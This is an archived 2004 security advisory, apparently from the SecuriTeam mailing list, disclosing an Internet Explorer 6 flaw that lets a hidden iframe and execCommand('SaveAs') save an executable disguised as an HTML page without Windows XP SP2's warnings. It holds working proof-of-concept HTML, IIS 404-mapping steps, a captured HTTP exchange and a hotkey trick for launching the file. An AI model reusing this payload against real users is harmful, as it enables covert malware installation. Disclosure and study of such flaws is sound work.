[NT] Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs' Function

• Previous message: SecuriTeam: "[UNIX] Privilege Escalation Vulnerabilities in W-Channel Embedded Linux"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 22 Nov 2004 16:39:16 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Circumvent Windows XP SP2 Security Features using execCommand 'SaveAs'
Function
------------------------------------------------------------------------

SUMMARY

Microsoft Internet Explorer (including IE for Windows XP SP2) is reported
to be vulnerable to a file downloading security warning bypass. This
unpatched flaw may be exploited to download a malicious executable file
masqueraded as an HTML file.

DETAILS

Vulnerable Systems:
 * Internet Explorer version 6

When your browser cannot locate the URL that you entered in the address
bar, you will receive a 404 error message telling you that the file was
not found. This exploit described below utilizes a custom HTTP 404 error
message (v.exe) which is feed to the execCommand Method, which in turn
executes the file (without warning). The only user input required is for
the user to accept a prompts requesting him to "Save an HTML Document".

1. Bypasses the "File Download - Security Warning".
Each time you click a download link, Windows XP pops up a "File Download -
Security Warning", making you aware that Windows is downloading a program.
In addition Windows XP will ask for your permission to complete the
download process.

2. Bypasses the "Open File - Security Warning".
Launching a downloaded executable that originates from an untrusted
location (zone) such as the Internet will bring up a "Open File - Security
Warning" that will ask you for the permission to install the file.

The execCommand Method:
The execCommand method executes a command on the current document. One of
the many parameters of this method is the SaveAs Command that saves the
current Web page to a local file. The SaveAs Command has the following
format: document.execCommand('SaveAs', '1', 'Name of the webpage.htm');

How does it work? (Exploit):
Notice that you didn't receive any warning messages such as: "File
Download - Security Warning" or "Open File - Security Warning".
In addition, if "Hide file extensions for known file types" (Tools->Folder
Options...->View) is enabled, (i.e., 'funny joke.exe' appears as 'funny
joke') it's possible to trick a user into downloading a malicious
executable file, masquerading it as an HTML document (Windows XP SP2 would
normally prevents direct downloading, but in our case it doesn't).

The following code requires no special server setup, and should work from
any web page that IE 6.0 downloads:
< html>
 < body>
 < iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0"
height="0"></iframe>Click
 < a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
 here</a>.
 </body>
 </html>

In addition, here's an example that requires modifying the IIS Error
Mapping Properties (see below):
Steps to configure IIS:
Launch Internet Information Services manager. Under the 'Custom Errors'
tab, modify the Error Mapping Properties as follows:
 * Error Code: 404
 * Default Text: Not Found
 * Message Type: URL
 * URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so it
will trigger a 404 error message as defined above. But, the JavaScript
code below references the stealthy v.exe data within the frame 'NotFound'
and is linked to 'funny joke.exe' when prompted to save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny
joke.exe');

Entire code sample for the 404 error page:
< html>
 < body>
 < iframe src='vengy404.htm' name="NotFound" width="0"
height="0"></iframe>Click
 < a href=#
onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">
 here</a>.
 </body>
 </html>

Breakdown of the TCP Stream going from an Internet Explorer to an IIS:
Here's what occurs internally when fetching the exploit web page plus the
404 error message (v.exe).

 GET /// HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT
If-None-Match: "7e5914d584cbc41:10d2"
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Server: Microsoft-IIS/5.1
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location: http://insecure.hopto.org:53/index.htm
ETag: "7e5914d584cbc41:10d2"
Content-Length: 0

GET ///vengy404.htm HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: insecure.hopto.org:53
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Cache-Control: no-cache,no-transform
Expires: Tue, 16 Nov 2004 12:31:00 GMT
Content-Location:
http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm
Vary: *
Date: Tue, 16 Nov 2004 12:31:00 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Content-Length: 91408
<---V.EXE binary data goes here --->

Solution:
Disable Active Scripting and the "Hide file extensions for known file
types" option
[Tools->Folder Options-> View]

Conclusion:
Overall IE attempts to intercept risky code and prompts a security warning
message, but it seems to allow custom HTTP errors to filter through those
security checks.

Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter',
saving it to the desktop installs a global hotkey, so it may be possible
to execute the downloaded file by simply forcing the user to press the
Enter key "alert('Thanks. Press Return')".
Funny and scary how a few well placed characters <iframe src='v.exe?.htm'
... can confuse the IE monster, whereas specifying <iframe src='v.exe'
... is handled correctly!

ADDITIONAL INFORMATION

The information has been provided by Cyber flash A.K.A Vengy and
<mailto:Special-Alerts@k-otik.com> K-OTiK team.
The original article can be found at:
<http://www.k-otik.com/exploits/20041119.IESP2disclosure.php>
http://www.k-otik.com/exploits/20041119.IESP2disclosure.php
Original exploit code can be found at:
<http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php>
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[UNIX] Privilege Escalation Vulnerabilities in W-Channel Embedded Linux"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]